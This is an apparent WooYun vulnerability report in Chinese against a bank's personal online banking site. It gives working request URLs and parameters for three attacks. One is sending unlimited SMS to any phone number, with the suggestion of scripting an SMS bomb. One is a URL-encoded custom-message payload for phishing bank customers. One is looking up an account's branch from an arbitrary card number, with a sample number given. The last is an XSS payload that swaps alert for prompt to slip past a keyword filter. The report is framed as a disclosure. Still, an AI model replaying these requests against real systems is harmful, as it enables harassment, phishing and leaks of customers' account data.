WooYun.org

1、短信自定义及无限任意手机发送(2个高风险合并)
链接：
https://perbank.bsb.com.cn/perbank/getMobileSmsPwdForMobankNo.do?EMP_SID=DEDBBRDYDGJPATJKAJHHCVCOHSGDHIFKEQBUFMIL
参数：
businessCode=014001&optionFlag=00&suffixParams=xxx&mobileNo=159xxxx(这里写自己的测试)&actionFlag=1&orderFlowNo=187
1）修改mobileNo为任意手机号可以向任意手机号发送短信，只在客户端做了校验，但是可以通过发包来绕过校验，无限向任意手机发送短信形成短信炸弹，可以写个脚本无限制向某个手机发送短信。

2）修改参数suffixParams可以自定短信，然后进行钓鱼，比如：
businessCode=014001&optionFlag=00&suffixParams=159xxxx%7c621xx(%e8%bf%99%e9%87%8c%e5%8f%af%e4%bb%a5%e8%87%aa%e5%ae%9a%e4%b9%89)%ef%bc%8c%e5%a6%82%e6%9c%89%e9%97%ae%e9%a2%98%e8%af%b7%e8%ae%bf%e9%97%aehttp%3a%2f%2fwww.diaoyu.com%ef%bc%8c%e6%88%96%e8%87%b4%e7%94%b5159xxxxxx(%e9%92%93%e9%b1%bc%e7%94%b5%e8%af%9d)&mobileNo=159xxxx(这里写自己的测试)&actionFlag=1&orderFlowNo=187
其中手机号和账户等任意信息都可以自定义，如图：

并且可以制造不同类型的钓鱼，修改参数optionFlag既可以，如：

2、账户开户行查询(高风险)
功能点：转账汇款 > 行内同名转账
链接：
https://perbank.bsb.com.cn/perbank/getAccOpenNode.do?EMP_SID=FBHXFIDZEMGRIUJIEHFMJQDVBSIRBOAYIUHSIPGK
修改参数payAccount为银行卡号任意号即可查询账户开户行，比如: 62176002000028609

3、XSS跨站脚本攻击(中风险)
功能点：客户服务->个人资料修改
链接:
https://perbank.bsb.com.cn/perbank/customerInfo_doConfirm.do?EMP_SID=DEDBBRDYDGJPATJKAJHHCVCOHSGDHIFKEQBUFMIL&email=&mobileNo=&zipCode=1111111111";prompt(1);//&address=test&phoneNo=
系统对XSS相关关键字符做了限制，并且在匹配上后作出登录限制，限制一定时间的登录，但规则还有一定的遗留，请加强补充，比如我先调用alert发现被爆了，而后运用prompt可以绕过规则。